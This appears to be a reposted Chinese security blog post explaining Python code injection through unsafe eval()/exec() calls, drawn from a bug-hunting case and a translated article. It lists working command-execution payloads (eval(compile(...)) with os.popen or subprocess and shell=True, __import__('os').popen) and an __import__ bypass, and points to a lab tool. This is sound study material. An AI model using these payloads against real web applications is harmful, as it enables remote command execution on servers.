【奇技淫巧】python代码注入

admin 2021年7月6日21:54:05评论194 views字数 1635阅读5分27秒阅读模式

【奇技淫巧】python代码注入


1.限号季,发一下之前的一点笔记写的很浅显希望各位大佬勿喷
.在挖掘某专属厂商的时候出现了一个有意思的地方,python代码执行

【奇技淫巧】python代码注入



2.简单的进行验证一下可以发现sleep进行了执行


【奇技淫巧】python代码注入



3.基本确定存在python代码执行漏洞,但是如何利用呢,翻到一篇安全客的文章https://www.anquanke.com/post/id/84891是一篇翻译的文章 ,简单的进行解析一下。
文章解析:
python代码注入的原因:
当你在网上搜索关于python的eval()函数时,几乎没有文章会提醒你这个函数是非常不安全的,而eval()函数就是导致这个Python代码注入漏洞的罪魁祸首。如果你遇到了下面这两种情况,说明你的Web应用中存在这个漏洞:
1. Web应用接受用户输入(例如GET/POST参数,cookie值);
2. Web应用使用了一种不安全的方法来将用户的输入数据传递给eval()函数(没有经过安全审查,或者缺少安全保护机制);
3.除了eval()函数之外,Python的exec()函数也有可能让你的Web应用中出现这个漏洞
这是文章中给的示例代码

【奇技淫巧】python代码注入



总结来说就是使用了eval 和exec函数没有进行过滤


4.然后作者提供了几个验证的payload

1.通过返回时间验证
eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))上面已经给了验证
2.命令执行
eval(compile("""for x in range(1):n import osn os.popen(r'COMMAND').read()""",'','single'))

【奇技淫巧】python代码注入



3.eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))命令执行
4.__import__('os').popen('COMMAND').read()命令执行

5.作者提供了一个python代码执行利用工具https://github.com/sethsec/PyCodeInjection,自己简单测试了一下,没成功有兴趣的可以研究一下

作者提供的复现环境:

git clone https://github.com/sethsec/PyCodeInjection.git 
cd VulnApp
./install_requirements.sh
python PyCodeInjectionApp.py

6.作者还提到了一个场景当全局函数“__import__”会不起作用的时候可以利用for循环

eval(compile("""for x in range(1):n import osn os.popen(r'COMMAND').read()""",'','single'))
eval(compile("""for x in range(1):n import subprocessn subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
eval(compile("""for x in range(1):n import subprocessn subprocess.check_output(r'COMMAND',shell=True)""",'','single'))

另外作者提到了一个点:为了将这个Payload发送给目标Web应用,你需要对其中的某些字符进行URL编码,但是我在进行验证的时候并不需要可能是场景的问题,具体的话还有很多需要探索的。
如何检测:这是作者提供的,我简单的理解就是hhh用burp或者扫描器检测

【奇技淫巧】python代码注入



具体也去搜索了一下发现国内并没有多少python代码注入漏洞的文章,如果有更好的检测方法可以在下面留言


【奇技淫巧】python代码注入

本文始发于微信公众号(T00ls):【奇技淫巧】python代码注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月6日21:54:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【奇技淫巧】python代码注入http://cn-sec.com/archives/348251.html

发表评论

匿名网友 填写信息